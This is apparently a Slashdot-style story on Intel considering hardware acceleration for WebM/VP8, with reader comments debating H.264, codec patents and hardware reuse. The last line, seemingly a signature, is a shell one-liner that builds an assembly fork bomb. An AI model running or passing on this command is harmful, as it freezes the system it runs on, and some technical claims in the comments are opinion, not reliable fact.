Intel Considers Hardware Acceleration For Google's WebM Format
CWmike writes "Intel is considering hardware-based acceleration for Google's new WebM video file format in its Atom-based TV chips if the format gains popularity, an Intel executive said on Thursday. Announced last Wednesday at Google I/O, WebM files will include video streams compressed with the open-source VP8 video codec, which was acquired by Google when it bought On2 Technologies in February. 'Just like we did with other codecs like MPEG2, H.264 and VC1, if VP8 establishes itself in the Smart TV space, we will add it to our [hardware] decoders,' said Wilfred Martis, a general manager at Intel's Digital Home Group."
WTF? Intel might add hardware support for this codec and you declare victory? Intel is a bit-player in hardware video decoders. H.264 is already everywhere. Also, I don't know where you get the idea that it's patent-free. You simply can't make a modern video codec without treading on someone's patent any more, and this is no exception. Remember MS proudly announced that VC1 was patent-free, too. It's all a form of corporate trolling.
Its not the first time that someone has had to build and incredibly similar version yet slightly worse, just to fill a civic need. On2 is doing what Tesla did when Edison prevented him from using his lightbulb design.
3 years from now? H.264 is on my computers, my blu ray player, my phone, my camera, my video camera, it's everywhere now. In order for any codec to replace H.264 it has to be technically superior, just not "free". And from what I've seen, VP8 is better than Theora, but still not H.264.
"The problem with socialism is eventually you run out of other people's money" - Thatcher.
And chances are they won't have to. Few devices have silicon h.264 decoders, instead having a DSP and a software h.264 codec. Plenty faster than a regular software decoder, cheaper and more flexible than a fixed decoder.
Given that VP8 is really just a minor modification of h.264, and Intel already supports h.264 decoding in hardware, what exactly has to be done to support VP8? Modify the driver to reload the proper DCT constants and other minor things. The only hardware stuff I can see is if the hardware is hardwired for h.264 in which case they need to rewire it to be a little more flexible. But given they support many codecs already with the same pieces, it should be already in place (a lot of other pieces get reused decoding VC-1, for example).
Surely all the h.264 blocks could be re-used as VP8? In which case Theora's practically dead because everything supports h.264 decoding already and can probably be trivially converted to support VP8 as well.
Heck, you probably can do the same with an h.264 encoder to have it spit out a VP8 bitstream...
The patents on GIF have expired. It's not just as free as PNG. Plus it supports animation. Also a lot of software - notably Photoshop - tends to produce smaller GIFs than PNGs for most images because the GIF generation code is more optimized.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;